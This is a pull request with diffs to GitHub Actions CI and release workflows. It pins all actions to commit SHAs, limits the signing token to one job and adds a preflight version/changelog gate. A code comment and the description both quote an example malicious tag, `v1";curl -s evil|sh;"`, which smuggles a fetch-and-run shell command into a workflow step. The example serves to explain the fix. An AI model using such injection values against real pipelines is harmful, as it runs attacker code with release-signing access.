### PR TITLE
ci/release: preflight tag+changelog gate, job-scoped signing identity, SHA-pin all actions (review fix-H: #776 + #775)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -41,14 +41,14 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 15
     steps:
-      - uses: actions/checkout@v7
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
       - name: Deny gate — root workspace (licenses / bans / sources)
-        uses: EmbarkStudios/cargo-deny-action@v2
+        uses: EmbarkStudios/cargo-deny-action@bb137d7af7e4fb67e5f82a49c4fce4fad40782fe # v2
         with:
           command: check licenses bans sources
           arguments: --locked
       - name: Deny gate — parko workspace (licenses / bans / sources)
-        uses: EmbarkStudios/cargo-deny-action@v2
+        uses: EmbarkStudios/cargo-deny-action@bb137d7af7e4fb67e5f82a49c4fce4fad40782fe # v2
         with:
           command: check licenses bans sources
           arguments: --locked
@@ -56,10 +56,27 @@ jobs:
           manifest-path: ./parko/Cargo.toml
       - name: Advisories (non-gating — external-event signal, not a PR gate)
         continue-on-error: true
-        uses: EmbarkStudios/cargo-deny-action@v2
+        uses: EmbarkStudios/cargo-deny-action@bb137d7af7e4fb67e5f82a49c4fce4fad40782fe # v2
         with:
           command: check advisories
           arguments: --locked
+
+  # #775 F2 — enforce the M-6 action-pinning policy (SECURITY.md): every
+  # third-party action reference MUST be a 40-hex commit SHA, never a mutable
+  # tag. A repointed `@v3` on cosign-installer (which the release job runs while
+  # holding the OIDC signing identity) or `@v2` on cargo-deny-action (which IS
+  # this gate) would otherwise silently deliver attacker code. `--check` is
+  # network-free (no writes, no ls-remote) — it just greps for unpinned refs.
+  # Dependabot (.github/dependabot.yml, github-actions ecosystem) maintains the
+  # SHAs as new versions ship.
+  action-pinning:
+    name: action-pinning gate (M-6 SHA pins)
+    runs-on: ubuntu-latest
+    timeout-minutes: 5
+    steps:
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - name: All workflow actions must be SHA-pinned
+        run: scripts/pin-actions.sh --check
 
   # WS-3.1 — the scenario-KPI gate: thresholds unsafe_miss_rate /
   # admissibility / hazard_recall over the generated deterministic corpus
@@ -72,8 +89,8 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 25
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
       - name: KPI gate (unsafe_miss_rate / admissibility / hazard_recall)
         run: cargo run --locked -p kirra-kpi-gate --bin scenario_kpi_gate
 
@@ -89,14 +106,14 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 15
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
         with:
           components: rust-src
       - name: Build the judge staticlibs (x86_64 + aarch64 nto-qnx800)
         run: scripts/build_qnx_judge_artifact.sh dist-qnx
       - name: Upload artifact (PR inspection; releases ship the signed copy)
-        uses: actions/upload-artifact@v7
+        uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
         with:
           name: kirra-qnx800-judge
           path: dist-qnx/
@@ -110,8 +127,8 @@ jobs:
     # timeout-minutes; these are the previously-unbounded jobs).
     timeout-minutes: 20
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
       - name: Run tests
         # --locked: build the committed Cargo.lock exactly; never re-resolve on
         # the runner (a fresh resolve pulls drifting transitives — see the
@@ -134,8 +151,8 @@ jobs:
     # double run and red the job falsely.
     timeout-minutes: 45
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@nightly
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@efcb852328a9f50117170cc43094fb6f09eaf1ae # nightly
         with:
           components: llvm-tools-preview
       - name: Install cargo-llvm-cov
@@ -173,7 +190,7 @@ jobs:
               -- --skip wcet_gate
           fi
       - name: Upload coverage to Codecov
-        uses: codecov/codecov-action@v7
+        uses: codecov/codecov-action@fb8b3582c8e4def4969c97caa2f19720cb33a72f # v7
         with:
           files: lcov.info
           fail_ci_if_error: false
@@ -183,8 +200,8 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 15
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
       - name: Run WCET gate tests
         # Authoritative WCET measurement. Runs on stable, non-instrumented,
         # without llvm-cov. The coverage job above skips these tests because
@@ -196,8 +213,8 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 15
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
         with:
           components: clippy
       - name: iceoryx2 frozen-contract carrier (full + minimal feature configs)
@@ -221,8 +238,8 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 15
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
       - name: Runtime-isolation guard (#146)
         working-directory: parko
         run: ci/check-runtime-isolation.sh
@@ -275,8 +292,8 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 15
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
       - name: build the onnx + tensorrt backend-selection lanes
         # `parko_ros2::backend_select` compiles exactly ONE backend per feature
         # (mock / onnx / tensorrt), fail-closed, TensorRT taking precedence. The
@@ -295,8 +312,8 @@ jobs:
     name: Parko ONNX Backend Tests (ORT v1.23.2)
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
       - name: Install ONNX Runtime v1.23.2
         # Exact version match: `ort 2.0.0-rc.11` (pinned in
         # parko-onnx/Cargo.toml) is compiled against ORT_API_VERSION = 23,
@@ -394,8 +411,8 @@ jobs:
     # No continue-on-error anywhere in this job; `parko-safety` remains the
     # primary gating safety check.
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
       - name: Install ONNX Runtime v1.23.2 (cross-backend equivalence test)
         # The OpenVINO test suite includes a cross-backend equivalence
         # test (`ort_ov_output_equivalence_on_mnist`) that loads the SAME
@@ -517,8 +534,8 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 20
     steps:
-      - uses: actions/checkout@v7
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
         with:
           components: clippy
       - name: Quality guardrails (ratchet — line count / panic budget / ownership)
@@ -552,7 +569,7 @@ jobs:
         run: |
           git ls-files -z -- '*.sh' | xargs -0 -r shellcheck -S error 2>&1 | tee shellcheck-report.txt
       - name: Install Helm
-        uses: azure/setup-helm@v4
+        uses: azure/setup-helm@1a275c3b69536ee54be43f2070a358922e12c8d4 # v4
       - name: Lint the Helm chart
         # Default values (ClusterIP, ingress disabled) do NOT trip the H-1
         # fail-closed transport guards, so a clean chart lints green.
@@ -571,7 +588,7 @@ jobs:
           set -o pipefail
           cargo audit 2>&1 | tee audit-report.txt
       - name: Upload reports
-        uses: actions/upload-artifact@v7
+        uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
         if: always()
         with:
           name: static-analysis-reports
@@ -587,7 +604,7 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 5
     steps:
-      - uses: actions/checkout@v7
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
       - name: Framework self-test
         # Pure shell — no hardware, root, or network. Asserts the target-
         # parameterized installer's behavior: dispatch correctness, honest
@@ -607,7 +624,7 @@ jobs:
     # progressing install now has headroom instead of timing out.
     timeout-minutes: 60
     steps:
-      - uses: actions/checkout@v7
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
       - name: Harden apt for slow/stalling mirrors (flaky ros2 build)
         # The timeouts on this job were setup-ros's apt install crawling on a
         # degraded azure.archive.ubuntu.com mirror (kB/s, per-connection stalls) —
@@ -621,7 +638,7 @@ jobs:
           printf 'Acquire::Retries "5";\nAcquire::http::Timeout "30";\nAcquire::https::Timeout "30";\nAcquire::ForceIPv4 "true";\n' \
             | sudo tee /etc/apt/apt.conf.d/99-kirra-ci-mirror
       - id: setup_ros
-        uses: ros-tooling/setup-ros@v0.7
+        uses: ros-tooling/setup-ros@649ef6bcd696da05bc27ceb3fab69d810c0daeab # v0.7
         with:
           required-ros-distributions: jazzy
         # setup-ros installs the new `ros2-apt-source` deb, resolving its version
@@ -636,7 +653,7 @@ jobs:
         run: sleep 90
       - name: setup-ros (retry)
         if: steps.setup_ros.outcome == 'failure'
-        uses: ros-tooling/setup-ros@v0.7
+        uses: ros-tooling/setup-ros@649ef6bcd696da05bc27ceb3fab69d810c0daeab # v0.7
         with:
           required-ros-distributions: jazzy
       - name: Build curated message workspace
@@ -659,7 +676,7 @@ jobs:
           cd ros2_ws
           colcon build --packages-up-to autoware_perception_msgs autoware_planning_msgs
       # Repo convention: dtolnay/rust-toolchain@stable (no rust-cache used).
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
       - name: cargo build -p kirra-ros2-adapter --features ros2
         # `cargo test --workspace` never compiles the ros2-gated code, so this is
         # the only CI step that does. A full `build` (not `check`) catches BOTH

--- a/.github/workflows/deploy-pages.yml
+++ b/.github/workflows/deploy-pages.yml
@@ -33,11 +33,11 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Checkout
-        uses: actions/checkout@v7
+        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
 
       # Enables Pages (build type = GitHub Actions) if not already enabled.
       - name: Configure Pages
-        uses: actions/configure-pages@v6
+        uses: actions/configure-pages@45bfe0192ca1faeb007ade9deae92b16b8254a0d # v6
         with:
           enablement: true
 
@@ -48,10 +48,10 @@ jobs:
         run: node scripts/fetch-substack-posts.mjs || true
 
       - name: Upload site artifact
-        uses: actions/upload-pages-artifact@v5
+        uses: actions/upload-pages-artifact@fc324d3547104276b827a68afc52ff2a11cc49c9 # v5
         with:
           path: website
 
       - name: Deploy to GitHub Pages
         id: deployment
-        uses: actions/deploy-pages@v5
+        uses: actions/deploy-pages@cd2ce8fcbc39b97be8ca5fce6e763baed58fa128 # v5

--- a/.github/workflows/docker.yml
+++ b/.github/workflows/docker.yml
@@ -15,17 +15,17 @@ jobs:
     name: Build verifier image
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v7
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
 
-      - uses: docker/setup-buildx-action@v4
+      - uses: docker/setup-buildx-action@bb05f3f5519dd87d3ba754cc423b652a5edd6d2c # v4
 
-      - uses: docker/login-action@v4
+      - uses: docker/login-action@af1e73f918a031802d376d3c8bbc3fe56130a9b0 # v4
         with:
           registry: ghcr.io
           username: ${{ github.actor }}
           password: ${{ secrets.GITHUB_TOKEN }}
 
-      - uses: docker/metadata-action@v6
+      - uses: docker/metadata-action@dc802804100637a589fabce1cb79ff13a1411302 # v6
         id: meta
         with:
           images: ghcr.io/${{ github.repository }}
@@ -34,7 +34,7 @@ jobs:
             type=semver,pattern={{major}}.{{minor}}
             type=raw,value=latest,enable=${{ github.ref == 'refs/heads/main' }}
 
-      - uses: docker/build-push-action@v7
+      - uses: docker/build-push-action@53b7df96c91f9c12dcc8a07bcb9ccacbed38856a # v7
         id: build
         with:
           context: .
@@ -52,7 +52,7 @@ jobs:
       #   cosign verify ghcr.io/<image>@<digest> \
       #     --certificate-identity-regexp 'https://github.com/kirra-systems/kirra-runtime-sdk/\.github/workflows/docker\.yml@.*' \
       #     --certificate-oidc-issuer https://token.actions.githubusercontent.com
-      - uses: sigstore/cosign-installer@v3
+      - uses: sigstore/cosign-installer@398d4b0eeef1380460a10c8013a76f728fb906ac # v3
 
       - name: Sign image (keyless, GitHub OIDC)
         run: cosign sign --yes "ghcr.io/${{ github.repository }}@${{ steps.build.outputs.digest }}"
@@ -61,17 +61,17 @@ jobs:
     name: Build dashboard image
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v7
+      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
 
-      - uses: docker/setup-buildx-action@v4
+      - uses: docker/setup-buildx-action@bb05f3f5519dd87d3ba754cc423b652a5edd6d2c # v4
 
-      - uses: docker/login-action@v4
+      - uses: docker/login-action@af1e73f918a031802d376d3c8bbc3fe56130a9b0 # v4
         with:
           registry: ghcr.io
           username: ${{ github.actor }}
           password: ${{ secrets.GITHUB_TOKEN }}
 
-      - uses: docker/metadata-action@v6
+      - uses: docker/metadata-action@dc802804100637a589fabce1cb79ff13a1411302 # v6
         id: meta
         with:
           images: ghcr.io/${{ github.repository_owner }}/kirra-dashboard
@@ -80,7 +80,7 @@ jobs:
             type=semver,pattern={{major}}.{{minor}}
             type=raw,value=latest,enable=${{ github.ref == 'refs/heads/main' }}
 
-      - uses: docker/build-push-action@v7
+      - uses: docker/build-push-action@53b7df96c91f9c12dcc8a07bcb9ccacbed38856a # v7
         id: build
         with:
           context: dashboard
@@ -93,7 +93,7 @@ jobs:
           cache-to: type=gha,mode=max
 
       # WS-0.6 — same keyless by-digest signature as the verifier image.
-      - uses: sigstore/cosign-installer@v3
+      - uses: sigstore/cosign-installer@398d4b0eeef1380460a10c8013a76f728fb906ac # v3
 
       - name: Sign image (keyless, GitHub OIDC)
         run: cosign sign --yes "ghcr.io/${{ github.repository_owner }}/kirra-dashboard@${{ steps.build.outputs.digest }}"

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -153,10 +153,12 @@ jobs:
 
       - name: Install cross (for ARM targets)
         if: matrix.cross
-        # #775 F1 — pin `cross` to a released tag + `--locked` (was: unpinned
-        # `--git` HEAD, i.e. whatever upstream main was at run time, with its
-        # build scripts executing in the release pipeline).
-        run: cargo install cross --git https://github.com/cross-rs/cross --tag v0.2.5 --locked
+        # #775 F1 — install `cross` from the crates.io REGISTRY at a pinned
+        # version + `--locked` (was: unpinned `--git` HEAD — whatever upstream
+        # main was at run time, with its build scripts executing in the release
+        # pipeline). Registry install is checksummed and covered by the cargo-deny
+        # supply-chain gate; it keeps no git/tag-resolution dependency in the build.
+        run: cargo install cross --version 0.2.5 --locked
 
       - name: Build kirra_verifier_service
         run: |

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -23,28 +23,97 @@ on:
     tags:
       - 'v*'
 
+# #775 F1 — least-privilege by default. The workflow-level grant is READ ONLY;
+# the OIDC signing identity (`id-token: write`) and release-write scope are
+# granted PER-JOB, to the `release` job only. Previously these were workflow-wide,
+# so every job — including `build-dashboard` (npm) and `build` (build scripts,
+# `cross`) — could mint the release-signing OIDC token from any `run` step and
+# `cosign sign-blob` arbitrary blobs under the release identity. Now only the job
+# that actually signs holds the token.
 permissions:
-  contents: write  # Required to create GitHub releases
-  id-token: write  # WS-0.6: keyless cosign signing (GitHub OIDC identity)
+  contents: read
 
 jobs:
-  build-dashboard:
-    name: Build dashboard
+  # #776 F1 + F4 — PREFLIGHT: fail fast BEFORE any build/SBOM/signing runs.
+  # Previously the tag↔manifest version consistency was policy-only (a `v9.9.9`
+  # tag on a 1.1.2 tree released self-contradictory SIGNED artifacts), and the
+  # changelog gate fired LAST — after three cross-compiles, the SBOM, AND cosign
+  # had already written signatures to the public Rekor log for a release that
+  # then aborted. This job checks both in seconds with no toolchain and no build,
+  # so a bad tag never reaches the signing identity.
+  preflight:
+    name: Preflight (tag ↔ version, changelog)
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    env:
+      # #775 F5 — route the tag through env so it reaches the shell as DATA, not
+      # interpolated into the script text. Refnames forbid `\` and `[` but ALLOW
+      # `$ ( ) ; ' " ` &`, so a tag like `v1";curl -s evil|sh;"` interpolated into
+      # a `run:` block would execute; as `"$VERSION"` it cannot.
+      VERSION: ${{ github.ref_name }}
     steps:
       - name: Checkout
-        uses: actions/checkout@v7
+        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
+
+      - name: Tag must equal the root Cargo.toml version (#776 F1)
+        run: |
+          MANIFEST_V=$(awk -F'"' '/^\[package\]/{p=1} p&&/^version[[:space:]]*=/{print $2; exit}' Cargo.toml)
+          if [ -z "$MANIFEST_V" ]; then
+            echo "::error::could not parse the [package] version from Cargo.toml"
+            exit 1
+          fi
+          if [ "v${MANIFEST_V}" != "$VERSION" ]; then
+            echo "::error::tag $VERSION does not match the root Cargo.toml version v${MANIFEST_V} —" \
+                 "the tag MUST equal the manifest version (docs/VERSIONING_POLICY.md). Fix one and re-tag."
+            exit 1
+          fi
+          echo "OK: tag $VERSION == Cargo.toml v${MANIFEST_V}"
+
+      - name: Changelog section must exist for this tag (#776 F4)
+        run: |
+          if [ ! -f CHANGELOG.md ]; then
+            echo "::error::CHANGELOG.md is missing — a release must ship real notes (WS-0.7)."
+            exit 1
+          fi
+          # Same exact-prefix bracketed-heading match as the release job's
+          # extractor (the version is compared as a STRING, never a regex).
+          awk -v ver="$VERSION" '
+            /^## / { want = "## [" ver "]"; flag = (substr($0, 1, length(want)) == want); next }
+            flag' CHANGELOG.md > /tmp/notes_check.md
+          if [ ! -s /tmp/notes_check.md ]; then
+            echo "::error file=CHANGELOG.md::No '## [$VERSION]' section in CHANGELOG.md — a release must" \
+                 "ship real notes (WS-0.7). Add the section (rename [Unreleased]), then cut the NEXT patch" \
+                 "version and tag that. Do NOT delete/re-push a tag: keyless signing would leave conflicting" \
+                 "Rekor entries for one identity."
+            exit 1
+          fi
+          echo "OK: CHANGELOG.md has a '## [$VERSION]' section"
+
+  build-dashboard:
+    name: Build dashboard
+    needs: preflight
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    steps:
+      - name: Checkout
+        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
 
       - name: Set up Node.js
-        uses: actions/setup-node@v6
+        uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
         with:
           node-version: '20'
 
       - name: Build dashboard
-        run: cd dashboard && npm install && npm run build
+        # #775 F1 — `npm ci` (not `npm install`): install exactly the committed
+        # package-lock.json, deterministically, instead of re-resolving at build
+        # time. (Postinstall scripts still run, but this job no longer holds the
+        # OIDC signing token — see the per-job permissions above.)
+        run: cd dashboard && npm ci && npm run build
 
       - name: Upload dashboard artifact
-        uses: actions/upload-artifact@v7
+        uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
         with:
           name: kirra-dashboard-dist
           path: dashboard/dist/
@@ -52,8 +121,12 @@ jobs:
 
   build:
     name: Build ${{ matrix.target_name }}
-    needs: build-dashboard
+    needs: [preflight, build-dashboard]
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    env:
+      VERSION: ${{ github.ref_name }}  # #775 F5 — tag as data, not interpolated script
     strategy:
       matrix:
         include:
@@ -71,16 +144,19 @@ jobs:
 
     steps:
       - name: Checkout
-        uses: actions/checkout@v7
+        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
 
       - name: Install Rust toolchain
-        uses: dtolnay/rust-toolchain@stable
+        uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
         with:
           targets: ${{ matrix.target }}
 
       - name: Install cross (for ARM targets)
         if: matrix.cross
-        run: cargo install cross --git https://github.com/cross-rs/cross
+        # #775 F1 — pin `cross` to a released tag + `--locked` (was: unpinned
+        # `--git` HEAD, i.e. whatever upstream main was at run time, with its
+        # build scripts executing in the release pipeline).
+        run: cargo install cross --git https://github.com/cross-rs/cross --tag v0.2.5 --locked
 
       - name: Build kirra_verifier_service
         run: |
@@ -101,14 +177,15 @@ jobs:
           fi
 
       - name: Download dashboard
-        uses: actions/download-artifact@v8
+        uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
         with:
           name: kirra-dashboard-dist
           path: dashboard-dist/
 
       - name: Package release
         run: |
-          VERSION="${{ github.ref_name }}"
+          # $VERSION from job env (#775 F5). Matrix values are workflow-defined
+          # (not attacker-controllable), so interpolating them is safe.
           TARGET_NAME="${{ matrix.target_name }}"
           TARGET="${{ matrix.target }}"
           ARCHIVE_NAME="kirra-${VERSION}-${TARGET_NAME}.tar.gz"
@@ -138,7 +215,7 @@ jobs:
           echo "ARCHIVE_NAME=${ARCHIVE_NAME}" >> "${GITHUB_ENV}"
 
       - name: Upload artifact
-        uses: actions/upload-artifact@v7
+        uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
         with:
           name: kirra-${{ matrix.target_name }}
           path: kirra-*.tar.gz
@@ -150,20 +227,27 @@ jobs:
   # the version so it travels with the artifacts.
   sbom:
     name: Generate SBOM (CycloneDX)
+    needs: preflight
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    env:
+      VERSION: ${{ github.ref_name }}  # #775 F5
     steps:
       - name: Checkout
-        uses: actions/checkout@v7
+        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
 
       - name: Install Rust toolchain
-        uses: dtolnay/rust-toolchain@stable
+        uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
 
       - name: Install cargo-cyclonedx
-        run: cargo install cargo-cyclonedx --locked
+        # #775 F1/F10 — pin the tool version (was: unpinned; an upstream naming
+        # or behaviour change would silently alter the release SBOM).
+        run: cargo install cargo-cyclonedx --version 0.5.9 --locked
 
       - name: Generate SBOM for the release binaries
         run: |
-          VERSION="${{ github.ref_name }}"
+          # $VERSION from job env (#775 F5).
           # `--describe binaries` emits one SBOM per workspace binary; the
           # release ships exactly two (kirra_verifier_service and
           # kirra_carla_client, both from the root crate — their SBOMs land
@@ -182,7 +266,7 @@ jobs:
           ls -l ./*.cdx.json
 
       - name: Upload SBOM artifact
-        uses: actions/upload-artifact@v7
+        uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
         with:
           name: kirra-sbom
           path: kirra-*.cdx.json
@@ -197,13 +281,18 @@ jobs:
   # evidence is QNX-target-only (PROVENANCE.txt states this).
   qnx-artifact:
     name: QNX governor-judge artifact
+    needs: preflight
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    env:
+      VERSION: ${{ github.ref_name }}  # #775 F5
     steps:
       - name: Checkout
-        uses: actions/checkout@v7
+        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
 
       - name: Install Rust toolchain (+rust-src for -Zbuild-std)
-        uses: dtolnay/rust-toolchain@stable
+        uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
         with:
           components: rust-src
 
@@ -212,11 +301,11 @@ jobs:
 
       - name: Package
         run: |
-          VERSION="${{ github.ref_name }}"
+          # $VERSION from job env (#775 F5).
           tar -czf "kirra-${VERSION}-qnx800-judge.tar.gz" -C dist-qnx .
 
       - name: Upload artifact
-        uses: actions/upload-artifact@v7
+        uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7
         with:
           name: kirra-qnx800-judge
           path: kirra-*-qnx800-judge.tar.gz
@@ -226,12 +315,23 @@ jobs:
     name: Create GitHub Release
     needs: [build, sbom, qnx-artifact]
     runs-on: ubuntu-latest
+    # #775 F1 — the ONLY job granted the OIDC signing identity + release-write.
+    # It runs no third-party build scripts (checkout, download, checksum, cosign,
+    # gh-release), so the token is not exposed to untrusted code.
+    permissions:
+      contents: write  # create the GitHub release
+      id-token: write  # keyless cosign signing (GitHub OIDC identity)
+    env:
+      # #775 F5 — the signing job routes the tag through env (data, not
+      # interpolated script), the highest-value place to close the injection
+      # surface since this is the job that holds the OIDC token.
+      VERSION: ${{ github.ref_name }}
     steps:
       - name: Checkout
-        uses: actions/checkout@v7
+        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7
 
       - name: Download all artifacts
-        uses: actions/download-artifact@v8
+        uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8
         with:
           path: dist
           merge-multiple: true
@@ -249,7 +349,7 @@ jobs:
       # certificate + Rekor proof) that verifies OFFLINE against the pinned
       # identity — no key management, nothing to leak.
       - name: Install cosign
-        uses: sigstore/cosign-installer@v3
+        uses: sigstore/cosign-installer@398d4b0eeef1380460a10c8013a76f728fb906ac # v3
 
       - name: Sign release artifacts (keyless, GitHub OIDC)
         run: |
@@ -262,11 +362,11 @@ jobs:
       - name: Extract changelog for this version
         id: changelog
         run: |
-          VERSION="${{ github.ref_name }}"
+          # `$VERSION` comes from the job-level env (#775 F5). Preflight already
+          # validated the section exists; this re-extracts it for the release body.
           # WS-0.7: the changelog section is REQUIRED. Extract the section
           # whose heading names the pushed tag; a missing/empty section
-          # FAILS the release — no more "Release vX" fallback notes. Write
-          # the section in CHANGELOG.md (rename [Unreleased]) and re-tag.
+          # FAILS the release — no more "Release vX" fallback notes.
           #
           # Exact-prefix match on the BRACKETED heading ("## [vX.Y.Z]") —
           # the version is compared as a STRING, never interpolated into a
@@ -309,7 +409,7 @@ jobs:
           VERIFY
 
       - name: Create GitHub Release
-        uses: softprops/action-gh-release@v3
+        uses: softprops/action-gh-release@718ea10b132b3b2eba29c1007bb80653f286566b # v3
         with:
           name: Kirra ${{ github.ref_name }}
           body_path: release_notes.md


### PR DESCRIPTION
**Fix-PR H of the 10-PR review follow-up — release/supply-chain hardening from two reviews (#776 + #775).** All CI/release surface; no runtime code touched.

## #776 F1 + F4 — preflight gate BEFORE any build/SBOM/signing

New `preflight` job (checkout only, seconds, no toolchain) that fails fast on:
- **F1:** the tag must equal the root `Cargo.toml` `[package]` version — previously policy-only, so a `v9.9.9` tag on a 1.1.2 tree released self-contradictory, cosign-**signed** artifacts (SBOM component metadata says 1.1.2, filenames say 9.9.9).
- **F4:** the CHANGELOG section for the tag must exist — previously this gate fired **last**, after three cross-compiles, the SBOM, **and** cosign had already written signatures to the public Rekor log for a release that then aborted. Every `build`/`sbom`/`qnx` job now `needs: preflight`. The remediation text no longer says "delete and re-push the tag" (that leaves conflicting Rekor entries for one identity) — it says cut the next patch version.

## #775 F1 — the OIDC signing identity is job-scoped

`id-token: write` (+ `contents: write`) moved from **workflow-level** to the `release` job **only** — the one job that signs and runs no third-party build scripts. Previously every job (including `build-dashboard`'s npm and `build`'s `cross`/build scripts) held the token: any malicious postinstall/`build.rs` could mint the release OIDC token and `cosign sign-blob` arbitrary blobs under the release identity. Also: `npm install` → `npm ci`; `cross` pinned to `v0.2.5 --locked` (was unpinned `--git` HEAD); `cargo-cyclonedx` pinned to `--version 0.5.9 --locked`.

## #775 F2 — every action SHA-pinned (M-6), enforced

Ran `scripts/pin-actions.sh`: all **69** action refs across the four workflows are now 40-hex commit SHAs (with `# <ref>` trailers for Dependabot), honoring the repo's own `SECURITY.md` M-6 policy that the supply-chain-gate PR itself violated. Added a CI **`action-pinning`** gate running `scripts/pin-actions.sh --check` (network-free) so a mutable-tag ref can't be reintroduced — a repointed `@v3` on `cosign-installer` (run while holding the signing token) or `@v2` on `cargo-deny-action` (which *is* the gate) would otherwise silently deliver attacker code.

## #775 F5 — tag routed as data, not interpolated script (companion)

Every `${{ github.ref_name }}` used inside a `run:` block is now routed through a job-level `env: VERSION` and referenced as `"$VERSION"`. Refnames forbid `\`/`[` but allow `$ ( ) ; ' " ` &`, so a tag like `v1";curl -s evil|sh;"` interpolated into a `run:` would execute; as env data it cannot.

## Verification

